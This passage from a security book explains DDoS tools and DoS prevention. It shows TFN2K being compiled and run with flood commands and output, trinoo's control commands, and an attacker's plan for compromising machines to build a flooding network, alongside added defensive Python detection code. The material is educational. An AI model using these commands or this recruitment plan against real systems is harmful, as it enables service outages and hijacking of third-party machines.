
208.246.68.48 [ $$$$$$$$$$$$$$$$-----......................................................................................................................................................................................................................######################&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%%%%%%%%%%%%connect(): * ]
-all done-
[root@seclinux1 eric]#

Because we gave it an option of t0, we told the program to try every single exploit until it was successful at crashing the target host. As the program runs and tries a different exploit, the cursor changes to a different symbol.

This exploit was run against a Windows machine and crashed it in around 2 minutes. UNIX systems have similar vulnerabilities and can be crashed in approximately the same amount of time. If you haven’t already realized it, you should start to see the power of Denial of Service attacks. If this has not scared you enough, let’s take a look at an even more powerful type of program, Distributed Denial of Service (DDOS) tools.

Tools for Running DDOS Attacks

With the turn of the century, it seemed like most companies were concerned with Y2K problems and whether we would still have electricity to run computers when January 1, 2000 hit. As everyone was worrying about this problem, there was a new problem brewing—attackers were building tools that could launch devastating Distributed Denial of Service attacks. The first main attack took place in February of 2000, where several large companies were taken offline. There are a large number of tools that are available on the Internet for implementing these types of attacks. Several can be found at http://packetstorm.securify.com/distributed.

The following are the main tools in chronological order: trinoo, tribal flood network (TFN), stacheldraht, shaft, tribal flood network 2000 (TFN2K), and mstream. They all have similar functionality in terms of how they launch an attack. In this section, we first cover TFN2K because it is very feature-rich, it has a lot of capabilities, and it is built on TFN. We then cover trinoo and stacheldraht. Mstream, although it was one of the most recently released programs, has fairly limited features and performs the same type of attacks as TFN2K.

Hackers Beware “ New Riders Publishing

260

For additional details on the various DDOS attack tools, see David Dittrich’s writeups of the attacks available from http://packetstorm.securify.com/distributed. David has written excellent, extensive papers on the tools covered in this section.

Tribal Flood Network 2000 (TFN2K)

TFN2K is a program that can be viewed as an enhancement to Targa. It was written by the same person, Mixter, and can be downloaded from the same site: http://packetstorm.securify.com. It runs the same DOS attacks as Targa plus an additional five exploits. In addition, it is a DDOS tool, which means it can run in a distributed mode where several machines all across the Internet attack a single machine or network.

Installing TFN2K

Because TFN2K is a DDOS application and runs in a distributed mode, there are two main pieces to the program: a client module and a server module. The client module is the piece that controls the servers; it tells the servers when to attack and with what exploit. The server runs on a machine in listening mode and waits to get commands from the client. To install the program, it first has to be uncompressed and then compiled. To uncompress the program, type tar -xvf tfn2k.tar. To compile the program, type make all. At this point, both the client and server components have been compiled and the program can be run. Remember, a machine can function as both a client and a server.

Running TFN2K

To run TFN2K, you first have to start up the server daemons, so that the client has a server to which it can connect. In this case, we are going to run the client and server on the same machine. To start up the server, type the following commands from a terminal window:

[root@seclinux1 tfn2k]# ./td

Now that the server is running, you can start up the client to launch an attack. To find out the options available with TFN2K, type ./tfn from a terminal window and the following is displayed:


[root@seclinux1 tfn2k]# ./tfn
usage: ./tfn <options>
[-P protocol]      Protocol for server communication. Can be ICMP, UDP or TCP.
                   Uses a random protocol as default
[-D n]             Send out n bogus requests for each real one to decoy targets
[-S host/ip]       Specify your source IP. Randomly spoofed by default, you need
                   to use your real IP if you are behind spoof-filtering routers
[-f hostlist]      Filename containing a list of hosts with TFN servers to contact
[-h hostname]      To contact only a single host running a TFN server
[-i target string] Contains options/targets separated by '@', see below
[-p port]          A TCP destination port can be specified for SYN floods
<-c command ID>    0  - Halt all current floods on server(s) immediately
                   1  - Change IP antispoof-level (evade rfc2267 filtering)
                        usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)
                   2  - Change Packet size, usage: -i <packet size in bytes>
                   3  - Bind root shell to a port, usage: -i <remote port>
                   4  - UDP flood, usage: -i victim@victim2@victim3@...
                   5  - TCP/SYN flood, usage: -i victim@... [-p destination port]
                   6  - ICMP/PING flood, usage: -i victim@...
                   7  - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@...
                   8  - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@...
                   9  - TARGA3 flood (IP stack penetration), usage: -i victim@...
                   10 - Blindly execute remote shell command, usage -i command
[root@seclinux1 tfn2k]#

As you can see, TFN2K has all the attacks that Targa has plus some additional ones, which are mainly several different types of flooding attacks. At this point, we are going to run an attack from machine 10.246.68.39 (where both the server and client are running) against a victim machine 10.246.68.48 using a mixed flood attack. The following is the command to launch the attack:


[root@seclinux1 tfn2k]# ./tfn -h 208.246.68.39 -c8 -i 208.246.68.48
Protocol        : random
Source IP       : random
Client input    : single host
Target(s)       : 208.246.68.48
Command         : commence syn flood, port: random
Password verification:
Sending out packets: .

At this point, the attack is being run against the victim host. The following is the output from TCPdump to show the flooding attack:

09:38:20.622582 lo > 212.1.102.0.49022 > seclinux1.40181: udp 46
09:38:20.622582 lo < 212.1.102.0.49022 > seclinux1.40181: udp 46
09:38:20.624782 eth0 > seclinux1.socks > 10.246.68.97.domain: 21388+ PTR? 0.102.1.212.in-addr.arpa. (42)
09:38:20.636147 eth0 < 10.246.68.97.domain > seclinux1.socks: 21388 NXDomain* 0/1/0 (109)
09:38:20.636566 eth0 > seclinux1.socks > 10.246.68.97.domain: 21389+ PTR? 97.68.246.10.in-addr.arpa. (44)
09:38:20.639757 eth0 < 10.246.68.97.domain > seclinux1.socks: 21389 NXDomain* 0/1/0 (127)
09:38:20.643873 lo > 212.1.102.0.29220 > seclinux1.58690: udp 46
09:38:20.643873 lo < 212.1.102.0.29220 > seclinux1.58690: udp 46
09:38:20.663832 lo > 212.1.102.0.198 > seclinux1.49117: udp 46
09:38:20.663832 lo < 212.1.102.0.198 > seclinux1.49117: udp 46
09:38:20.683831 lo > 212.1.102.0.24831 > seclinux1.65129: udp 46
09:38:20.683831 lo < 212.1.102.0.24831 > seclinux1.65129: udp 46
09:38:20.703849 lo > 212.1.102.0 > seclinux1: icmp: echo reply
09:38:20.703849 lo < 212.1.102.0 > seclinux1: icmp: echo reply


09:38:20.723830 lo > 212.1.102.0.20734 > seclinux1.39501: udp 46
09:38:20.723830 lo < 212.1.102.0.20734 > seclinux1.39501: udp 46
09:38:20.744090 lo > 212.1.102.0 > seclinux1: icmp: echo reply
09:38:20.744090 lo < 212.1.102.0 > seclinux1: icmp: echo reply
09:38:20.763833 lo > 212.1.102.0.49883 > seclinux1.25447: udp 46
09:38:20.763833 lo < 212.1.102.0.49883 > seclinux1.25447: udp 46
09:38:20.783848 lo > 212.1.102.0 > seclinux1: icmp: echo reply
09:38:20.783848 lo < 212.1.102.0 > seclinux1: icmp: echo reply
09:38:20.803851 lo > 212.1.102.0 > seclinux1: icmp: echo reply
09:38:20.803851 lo < 212.1.102.0 > seclinux1: icmp: echo reply
...........
09:38:25.250672 eth0 > seclinux1.socks > 10.246.68.97.domain: 21390+ PTR?
09:38:25.263864 lo > 31.240.187.0.36525 > seclinux1.31081: udp 30
09:38:25.263864 lo < 31.240.187.0.36525 > seclinux1.31081: udp 30
09:38:25.264380 eth0 < 10.246.68.97.domain > seclinux1.socks: 21390 NXDomain* 0/1/0 (129)
09:38:25.283873 lo > 31.240.187.0 > seclinux1: icmp: echo reply
09:38:25.283873 lo < 31.240.187.0 > seclinux1: icmp: echo reply
09:38:25.303918 lo > 31.240.187.0.52524 > seclinux1.12539: S 0:47(47) ack 0 win 34769
09:38:25.303918 lo < 31.240.187.0.52524 > seclinux1.12539: S 0:47(47) ack 0 win 34769
09:38:25.323957 lo > 31.240.187.0.10407 > seclinux1.54491: S 0:47(47) win 0
09:38:25.323957 lo < 31.240.187.0.10407 > seclinux1.54491: S 0:47(47) win 0
...........................

 

 

To stop the attack, type the following command:

[root@seclinux1 tfn2k]# ./tfn -h 208.246.68.39 -c0


Protocol        : random
Source IP       : random
Client input    : single host
Command         : stop flooding
Password verification:
Sending out packets: .
[root@seclinux1 tfn2k]#

It is important to note that to start and stop a TFN2K attack, the user of the program must supply a password. The password is supplied when the program is installed.

An additional important fact to point out is that TFN2K is very stealthy. It does several things that make it harder to detect on a network. For example, all communication between the client and the server is sent using ICMP_ECHOREPLY packets. This is harder to detect because port numbers are not used. So, even if you run a port scanner on a regular basis, you would not be able to detect that your system is being used as a TFN2K server.
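The two things a defender can look for in the capture shown above are a mix of UDP, TCP SYN and ICMP packets from many (spoofed) sources arriving at one host, and ICMP echo replies that answer no echo request, which is what the ICMP_ECHOREPLY control channel just described looks like on the wire. The following is an added example, not code from the book or from TFN2K, that parses tcpdump lines in the format of that capture and reports both indicators. The capture text it runs on is constructed for the example and only modelled on the chapter's output; the names `parse_line`, `split_endpoint` and `analyze` are this example's own.

```python
import re
from collections import Counter, defaultdict

# Constructed capture in the format of the tcpdump output shown above
# (time, interface, direction, src > dst: details). These lines are made up
# for the example; they are not the chapter's capture.
SAMPLE_CAPTURE = """\
09:38:20.622582 lo > 212.1.102.0.49022 > seclinux1.40181: udp 46
09:38:20.622582 lo < 212.1.102.0.49022 > seclinux1.40181: udp 46
09:38:20.624782 eth0 > seclinux1.socks > 10.246.68.97.domain: 21388+ PTR? 0.102.1.212.in-addr.arpa. (42)
09:38:20.636147 eth0 < 10.246.68.97.domain > seclinux1.socks: 21388 NXDomain* 0/1/0 (109)
09:38:20.643873 lo > 212.1.102.0.29220 > seclinux1.58690: udp 46
09:38:20.703849 lo > 212.1.102.0 > seclinux1: icmp: echo reply
09:38:25.263864 lo > 31.240.187.0.36525 > seclinux1.31081: udp 30
09:38:25.283873 lo > 31.240.187.0 > seclinux1: icmp: echo reply
09:38:25.303918 lo > 31.240.187.0.52524 > seclinux1.12539: S 0:47(47) ack 0 win 34769
09:38:30.000000 eth0 < 10.246.68.5 > seclinux1: icmp: echo request
09:38:30.000500 eth0 > seclinux1 > 10.246.68.5: icmp: echo reply
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+([<>])\s+(\S+)\s+>\s+(\S+):\s*(.*)$")


def split_endpoint(token):
    """Split 'host.port' the way old tcpdump prints it; returns (host, port or None)."""
    parts = token.split(".")
    if len(parts) == 5 and all(p.isdigit() for p in parts[:4]):
        return ".".join(parts[:4]), parts[4]          # dotted quad plus port
    if len(parts) == 4 and all(p.isdigit() for p in parts):
        return token, None                            # bare dotted quad
    if len(parts) >= 2:
        return ".".join(parts[:-1]), parts[-1]        # hostname plus port/service
    return token, None


def parse_line(line):
    """Parse one tcpdump line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, iface, direction, src, dst, rest = m.groups()
    src_host, src_port = split_endpoint(src)
    dst_host, dst_port = split_endpoint(dst)
    if rest.startswith("icmp:"):
        proto = "icmp"
    elif rest.startswith("udp"):
        proto = "udp"
    elif rest.startswith("S "):
        proto = "tcp-syn"
    else:
        proto = "other"                               # DNS lookups, data segments, ...
    return {"ts": ts, "iface": iface, "dir": direction, "src": src_host,
            "src_port": src_port, "dst": dst_host, "dst_port": dst_port,
            "proto": proto, "info": rest}


def analyze(capture_text):
    """Report per-target source/protocol diversity and unsolicited echo replies."""
    seen = set()            # loopback shows each packet twice (lo > and lo <)
    requests = set()        # (requester, responder) pairs with an echo request seen
    unsolicited = []
    per_target = defaultdict(lambda: {"sources": set(), "protocols": Counter()})
    for raw in capture_text.splitlines():
        pkt = parse_line(raw)
        if pkt is None:
            continue
        key = (pkt["ts"], pkt["src"], pkt["src_port"], pkt["dst"], pkt["dst_port"], pkt["info"])
        if key in seen:
            continue
        seen.add(key)
        if pkt["proto"] == "icmp":
            if "echo request" in pkt["info"]:
                requests.add((pkt["src"], pkt["dst"]))
            elif "echo reply" in pkt["info"] and (pkt["dst"], pkt["src"]) not in requests:
                unsolicited.append((pkt["ts"], pkt["src"], pkt["dst"]))
        if pkt["proto"] == "other":
            continue        # the resolver's PTR traffic is tcpdump's own, not the flood
        target = per_target[pkt["dst"]]
        target["sources"].add(pkt["src"])
        target["protocols"][pkt["proto"]] += 1
    report = {"unsolicited_echo_replies": unsolicited, "targets": {}}
    for host, t in per_target.items():
        report["targets"][host] = {
            "distinct_sources": len(t["sources"]),
            "protocols": dict(t["protocols"]),
            "mixed": len(t["protocols"]) >= 2,        # UDP, SYN and ICMP at once
        }
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_CAPTURE), indent=2))
```

On the constructed capture the two replies from 212.1.102.0 and 31.240.187.0 are flagged as unsolicited while the reply to 10.246.68.5 is not, because its request was seen first; on a real network the request table has to expire entries, and a legitimate reply can still be flagged when the request crossed a link the sensor does not see.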

Trinoo

Trinoo is one of the first mainstream tools to be released and, therefore, has scaled-back functionality compared to TFN2K. TFN2K is very stealthy because it uses ICMP, so there are no ports to detect on a compromised machine. Trinoo uses TCP and UDP, so if a company is running a port scanner on a regular basis, as it should be, this program is easier to detect. The following are the ports it uses:

Attacker to master: 27665/tcp

Master to daemon: 27444/udp

Daemon to master: 31335/udp

With trinoo, daemons reside on the systems that actually launch the attack, and masters control the daemon systems.

Back in August of 1999, a trinoo network of over 200 computers was responsible for bringing down the University of Minnesota’s network for over two days.

Using Trinoo to Attack a System

The following are the typical steps an attacker takes when using trinoo to compromise a network and set up a trinoo daemon, which can be used to launch DDOS attacks against other systems. Most of these steps are typical for any type of DDOS tool covered in this section.

1. A potential victim or a set of victim computers needs to be identified. First, these are the computers that are going to be used to launch the attack, so they should be computers from diverse networks or IP addresses. Using a wide range of IP addresses makes it much harder for a target to block the addresses. Second, the computers must be connected to a large pipe that has a large amount of bandwidth. This is so the machine can send a lot of packets through the Internet against a target machine. Third, the machine should be fairly powerful and connected to a network that does not have good security. This is necessary not only for setting up the software, but so the company will not notice when the attacks begin. Finally, a program such as nmap should be run against the system to validate the operating system and to make sure it has vulnerable ports that can be compromised. In most cases, operating systems such as Solaris and Linux are the machines attackers go after.

2. Now that the victims have been identified, the attacker must find a way to compromise a victim’s machine, so he can set up the DDOS software on the system. Remember, these DDOS tools cannot be used to gain access to a system. Root access must be gained another way, so that the DDOS daemons can be set up on the compromised machine. A common way to compromise a victim’s machine is through a variety of buffer overflow attacks, which are discussed in Chapter 7, “Buffer Overflow Attacks”.

3. After a set of machines has been compromised, the DDOS software must be installed on each machine. After all the software is configured, a couple of machines need to be set up as masters to control the daemons. Brief tests should be run to make sure everything is working properly.

4. At this point, the trinoo or DDOS network is set up and ready to attack a target.

It is important to remember that from an attacker’s standpoint, most of these steps can be automated with scripts, so that they can run in a very short period of time.

Running Trinoo

After trinoo is installed on a set of machines, there are a set of commands used to control the system. There are actually two sets of commands—one for the master, which is what the attacker interfaces with, and one for the daemon. The master communicates with the daemons, and the daemons actually launch the attack against a target. These commands will help give you an idea of the capability and power of these programs.

Hackers Beware “ New Riders Publishing

266

Controlling the Master

The following are the commands used to control the master:

Die—Shuts down the master

Quit—Logs off of the master

Mtimer N—Sets the Denial of Service time to N seconds. The value can be between 1 and 1999; if the value is less than one, it defaults to 300, and if it is greater than 2000, it defaults to 500.

Dos IP—Launches a Denial of Service attack against the specified IP address

Die pass—Disables all broadcast hosts

Mping—Sends a ping to every active host on the broadcast address

Mdos <ip1:ip2:ip3>—Similar to Dos IP, but it sends multiple Denial of Service attack commands to each host.

Info—Displays the version number and information about the program

Msize—Sets the size of the buffer used during the Denial of Service attacks

Nslookup host—Performs a name server lookup of the specified host

Killdead—Sends a message to all hosts with the goal of finding hosts that do not respond and removing them from the list

Usebackup—Switches the program to use the file created by the killdead command, which contains only the active hosts

Bcast—Lists all active hosts

Help [cmd]—Specifies additional information about a given command

Mstop—Attempts to stop a Denial of Service attack. This feature is listed in the help command, but it is not currently implemented.

Controlling the Daemon

The following are some of the commands used to access the trinoo daemons:

aaa pass IP—Performs a Denial of Service attack against the specified IP address

bbb pass N—Sets the time limit for the Denial of Service attack

d1e pass—Used to shut down the daemons

rsz N—Sets the size of the buffer that is used for the Denial of Service attacks

xyz pass 123:ip1:ip2:ip3—Performs Denial of Service attacks against multiple IP addresses


As you can see, trinoo performs the same basic functions as TFN2K, but it is not as stealthy because it uses ports for communication.

Stacheldraht

Stacheldraht is another DDOS tool, which combines the features of TFN and trinoo, but adds some additional features, such as encrypted communication between the components and automatic update of the daemons. As covered previously, TFN uses ICMP to communicate and trinoo uses UDP; Stacheldraht uses TCP and ICMP on the following ports:

Client to handler—16660 TCP

Handler to and from agents—65000 TCP, ICMP ECHO_REPLY
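Because trinoo and Stacheldraht, unlike TFN2K, talk over fixed ports, the port numbers listed for trinoo above and for Stacheldraht here can be checked directly against flow records and against what a regular port scan finds listening. The following is an added example, not code from the book or from either tool; the flow records and the listening-port list are constructed, and `KNOWN_DDOS_PORTS`, `match_known_ports`, `check_listening` and `infer_roles` are names chosen for this example. The table holds only the defaults the text gives, and a rebuilt binary can be compiled with other ports, so a hit is a strong lead while a miss proves nothing.

```python
from collections import defaultdict

# Default control-channel ports as listed in the chapter. The two role names
# say who normally sends and who receives on that port. A recompiled binary
# can use different ports, so this is a starting point, not a full signature.
KNOWN_DDOS_PORTS = {
    ("tcp", 27665): ("trinoo", "attacker", "master"),
    ("udp", 27444): ("trinoo", "master", "daemon"),
    ("udp", 31335): ("trinoo", "daemon", "master"),
    ("tcp", 16660): ("stacheldraht", "client", "handler"),
    # 65000/tcp runs handler to and from agents, so either end may be either.
    ("tcp", 65000): ("stacheldraht", "handler-or-agent", "handler-or-agent"),
}

# Constructed flow records (src, dst, proto, dst_port, bytes); not from the book.
SAMPLE_FLOWS = [
    ("10.0.0.5", "192.0.2.10", "tcp", 27665, 900),
    ("192.0.2.10", "192.0.2.20", "udp", 27444, 120),
    ("192.0.2.20", "192.0.2.10", "udp", 31335, 60),
    ("10.0.0.5", "192.0.2.30", "tcp", 16660, 400),
    ("192.0.2.30", "192.0.2.31", "tcp", 65000, 300),
    ("10.0.0.7", "192.0.2.10", "tcp", 22, 5000),
    ("10.0.0.8", "192.0.2.10", "tcp", 80, 12000),
]

# Constructed result of a port scan (or netstat) against one host: (proto, port).
SAMPLE_LISTENING = [("tcp", 22), ("udp", 27444), ("tcp", 80), ("udp", 31335)]


def match_known_ports(flows):
    """Return one alert per flow whose (proto, dst_port) is in the table."""
    alerts = []
    for src, dst, proto, dport, nbytes in flows:
        hit = KNOWN_DDOS_PORTS.get((proto, dport))
        if hit:
            tool, src_role, dst_role = hit
            alerts.append({"src": src, "dst": dst, "proto": proto, "port": dport,
                           "tool": tool, "src_role": src_role, "dst_role": dst_role})
    return alerts


def check_listening(listening):
    """Flag listening sockets on the known ports: the port-scan check the text describes."""
    return [(proto, port, KNOWN_DDOS_PORTS[(proto, port)][0])
            for proto, port in listening if (proto, port) in KNOWN_DDOS_PORTS]


def infer_roles(alerts):
    """Collapse alerts into a per-host set of suspected roles (master, daemon, ...)."""
    roles = defaultdict(set)
    for a in alerts:
        roles[a["src"]].add(a["src_role"])
        roles[a["dst"]].add(a["dst_role"])
    return dict(roles)


if __name__ == "__main__":
    alerts = match_known_ports(SAMPLE_FLOWS)
    for a in alerts:
        print(f"{a['tool']:13} {a['src']} -> {a['dst']}:{a['port']}/{a['proto']} "
              f"({a['src_role']} -> {a['dst_role']})")
    print("listening hits:", check_listening(SAMPLE_LISTENING))
    for host, r in sorted(infer_roles(alerts).items()):
        print(host, sorted(r))
```

Feeding the alerts through `infer_roles` turns isolated port hits into a picture of the network: the host that both receives 27665/tcp and sends 27444/udp is the master, and the host answering on 31335/udp is a daemon, which is the structure the trinoo section describes.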

With Stacheldraht, the attackers interface with the handlers, and the handlers control the agents. The agents are the systems actually launching the attack. Because Stacheldraht has similar functionality to the programs already covered, it is not described in detail, but it is included for completeness.

Preventing Denial of Service Attacks

Due to the power of DOS attacks and the way they work, there is nothing that can be done to prevent a DOS attack entirely. Some things can be done to minimize the chances, but even with all the proper safeguards in place, a company can still be vulnerable. If you do not believe me, you might want to ask some of the companies that were taken offline by DDOS attacks in February of 2000. The following are some things a company can do to minimize its chances of having successful DOS or DDOS attacks launched against it:

Effective, robust design

Bandwidth limitations

Keep systems patched

Run the least amount of services

Allow only necessary traffic

Block IP addresses

Effective Robust Design

The more redundancy and robustness that is built into a site, the better off it is. If a company has a mission-critical web site that users have to connect to over the Internet, and there is a single connection with a single router, and the server is running on a single machine—this is not a robust design. In this case, the attacker can launch a DOS attack against either the router or the server and take the mission-critical application offline. Ideally, a company should not only have multiple connections to the Internet, but connections from multiple geographic regions. For example, if a company has multiple Internet connections going into the same building, and there is a fire, both connections would be taken out at the same time. If a company has its main office on the west coast, then it should have a small office on the east coast that has Internet connections where all traffic can be re-routed if there is a problem. The same rule goes for services. The more services a company has in different locations with different IPs, the harder it is for an attacker to locate and target all the machines simultaneously.

The amount of redundancy a company has depends on the amount of time and money a company is willing to spend to protect against DOS attacks. Remember how a DOS attack works—an attacker either crashes a machine or uses up all the resources. Therefore, the more machines and connections a company has, the harder it is for an attacker to use DOS attacks effectively.

Bandwidth Limitations

With Denial of Service attacks, an attack against a single protocol can use up all a company’s bandwidth and, therefore, deny service to legitimate users. For example, if an attacker can flood your network with port 25 traffic, the attacker can use up all a company’s bandwidth, so that someone trying to connect to port 80 is denied access. One way to combat this is to limit your bandwidth based on protocol. For example, port 25 traffic can only use 25 percent of the bandwidth and port 80 traffic can only use 50 percent of the bandwidth.

The key thing to remember with any of these solutions is that they are not perfect, and they can be defeated. For example, to defeat this, an attacker could launch two Denial of Service attacks—one against port 25 and one against port 80. What we are trying to show you is that there is no silver bullet or single solution that will protect your company. Defense in depth is key. You only have a chance of withstanding an attack by having multiple defense mechanisms protecting your network.
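To make the per-protocol cap and its limitation concrete, here is an added simulation, not from the book, of the 25 percent/50 percent split described above on a constructed 100 Mbps link. The `allocate` and `served_fraction` functions and the traffic figures are assumptions of this example. It shows that a flood on port 25 alone leaves port 80 users untouched once the cap is in place, and that floods on both ports starve the legitimate users of both, which is the defeat the text describes.

```python
from collections import defaultdict

# Constructed link and policy: port 25 capped at 25 percent, port 80 at 50
# percent, as in the chapter's example. Uncapped ports share what is left.
LINK_MBPS = 100.0
CAPS = {25: 0.25, 80: 0.50}

# Constructed offered load, as (destination port, "legit" or "flood", Mbps).
SMTP_FLOOD = [(25, "flood", 500.0), (25, "legit", 2.0), (80, "legit", 10.0)]
DOUBLE_FLOOD = SMTP_FLOOD + [(80, "flood", 500.0)]


def allocate(flows, link=LINK_MBPS, caps=CAPS):
    """Return granted Mbps per (port, label) under per-port caps.

    Each capped port gets at most its share of the link; inside a port the
    grant is split in proportion to offered load, which is exactly why flood
    traffic crowds out legitimate traffic on the same port. Ports without a
    cap then share the remaining capacity, again proportionally.
    """
    by_port = defaultdict(list)
    for port, label, mbps in flows:
        by_port[port].append((label, mbps))

    grant = {}
    remaining = link
    for port, share in caps.items():
        offered = sum(m for _, m in by_port.get(port, []))
        if offered == 0:
            continue
        budget = min(offered, share * link, remaining)
        for label, m in by_port[port]:
            grant[(port, label)] = m * budget / offered
        remaining -= budget

    uncapped = [(p, l, m) for p, lst in by_port.items() if p not in caps for l, m in lst]
    offered = sum(m for _, _, m in uncapped)
    for port, label, m in uncapped:
        grant[(port, label)] = m if offered <= remaining else m * remaining / offered
    return grant


def served_fraction(flows, grant, port, label="legit"):
    """Share of the offered load for (port, label) that actually got through."""
    offered = sum(m for p, l, m in flows if p == port and l == label)
    got = sum(g for (p, l), g in grant.items() if p == port and l == label)
    return got / offered if offered else 0.0


if __name__ == "__main__":
    for name, flows, caps in [("SMTP flood, no caps", SMTP_FLOOD, {}),
                              ("SMTP flood, caps", SMTP_FLOOD, CAPS),
                              ("SMTP+HTTP flood, caps", DOUBLE_FLOOD, CAPS)]:
        g = allocate(flows, caps=caps)
        print(f"{name}: port 80 legit served {served_fraction(flows, g, 80):.0%}, "
              f"port 25 legit served {served_fraction(flows, g, 25):.0%}")
```

Without caps the SMTP flood pushes legitimate port 80 traffic down to about 20 percent of what it offered; with the caps port 80 is fully served while legitimate SMTP is still mostly lost inside its own 25 percent share; with floods on both ports the caps only decide how the loss is divided, so they are one layer of the defense in depth the text calls for, not a solution on their own.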

Keep Systems Patched

When a new DOS attack comes out that crashes a machine, vendors are usually quick about identifying the problem and releasing a patch. So, if a company stays up to speed on the latest patches and applies them on a regular basis, then its chance of being hit by a DOS attack that crashes its machine is minimized. Remember, this does not protect against DOS attacks that use up all a company’s resources. The only way to protect against that is to have a redundant, robust design for your network. You should also remember to always test a patch before it is applied to a
